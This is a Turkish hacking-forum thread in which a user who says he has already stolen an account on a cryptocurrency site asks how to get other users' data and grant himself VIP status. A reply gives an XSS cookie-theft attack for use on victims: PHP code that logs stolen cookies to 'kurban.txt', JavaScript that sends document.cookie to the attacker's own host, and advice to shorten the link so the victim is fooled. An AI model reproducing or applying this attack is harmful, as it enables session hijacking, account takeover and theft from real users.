Kripto sitesi

Mtk4725

Mtk4725

Yeni üye
13 Tem 2020
23
2
Merhabalar ben bir tane eski kripto sitesi buldum ve bir tanede hesabı çaldım ve bazı sorunlarım var

Amacım sitenin açığını bulmam ve başka kullanıcı bilgilerini öğrenmem gerek ayrıca kullanıcı bilgilerini öğrenemesem bile kendi hesabıma nasıl vip üyelik veririm?
 
Moderatör tarafında düzenlendi:
Tarihe göre sırala Oylara göre sırala
G

'GHOST

Uzman üye
31 Mar 2022
1,387
12
568
Mtk4725' Alıntı:
Merhabalar ben bir tane eski kripto sitesi buldum ve bir tanede hesabı çaldım ve bazı sorunlarım var

Amacım sitenin açığını bulmam ve başka kullanıcı bilgilerini öğrenmem gerek ayrıca kullanıcı bilgilerini öğrenemesem bile kendi hesabıma nasıl vip üyelik veririm?
Genişletmek için tıkla ...
Merhaba tabikide bunun için sitenin veritabanina erişim kazanabilcegin bir acik bulman lazim.Belli alanlarda Request ve response isteklerini kontrol edebilir , veritabaniyla bağlantı kuran girdi kısımlarında sql injection, xss ,file upload vb. birçok açık turunu deneyebilirsin filtreleme kosullarinida denemeler ile tespit edip buna uygun xss scriptleri yazabilirsin.





Kullanıcının sisteme giriş yapmasını sağlayan bilgileri elde etmek için:

Eğer sitede xss açığı varsa ki bu xss açığının stored vb. olmasına gerek yok çünkü bu işlem kişinin browserinda gerçekleşecek.



tk vb ücretsiz bir domain açıp hostinge bağla bazı hostingler tk ya izin vermiyor onun için cf uzantili domain de olur sonrasında js php ve txt dosyalri oluştur .Sitede xss aciginin oldugu yerde js dosyasını dahil edeceğiz.js dosyasi ise http get isteğiyle cookie bilgisini senin olusturdugun siteye bağlanarak php dosyasına gönderecek php ise bu cookie yi txt dosyasına yazacak. Bunun için girdi kismindaki xss acigi olan kisimda sitendeki js dosyasini dahil edeceğin js scriptini yaz ve bu url i kopyala daha sonrasinda bu url i kurbanın anlamamasi için online sitelerde kisalt ve kurbana gonder sonrasinda sistem calisirsa site bunu engellemesse kurbanın cookie bilgisi eline düşecek ve bu cookie bilgisi ile kurban kisi gibi siteye giris yapabilirsib tabi bu cookie bilgisi güvenlikli değilse.



Anlatımındaki dosyâlar düzenlemeleri yap

kayıt.php :

PHP: 
<?php

if(isset($_GET["cookie"])){

    $file = fopen("kurban.txt', 'a');

    fwrite($file, $_GET["cookie"]."\n");

    fclose($file);

}
?>

js.js :

JavaScript: 
var xmlHttp = new XMLHttpRequest();

 xmlHttp.open("GET", 'http://siten/kayıt.php?cookie='+document.cookie);

 xmlHttp.send(null);

Ve diğer bir dosya olan kurban.txt
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.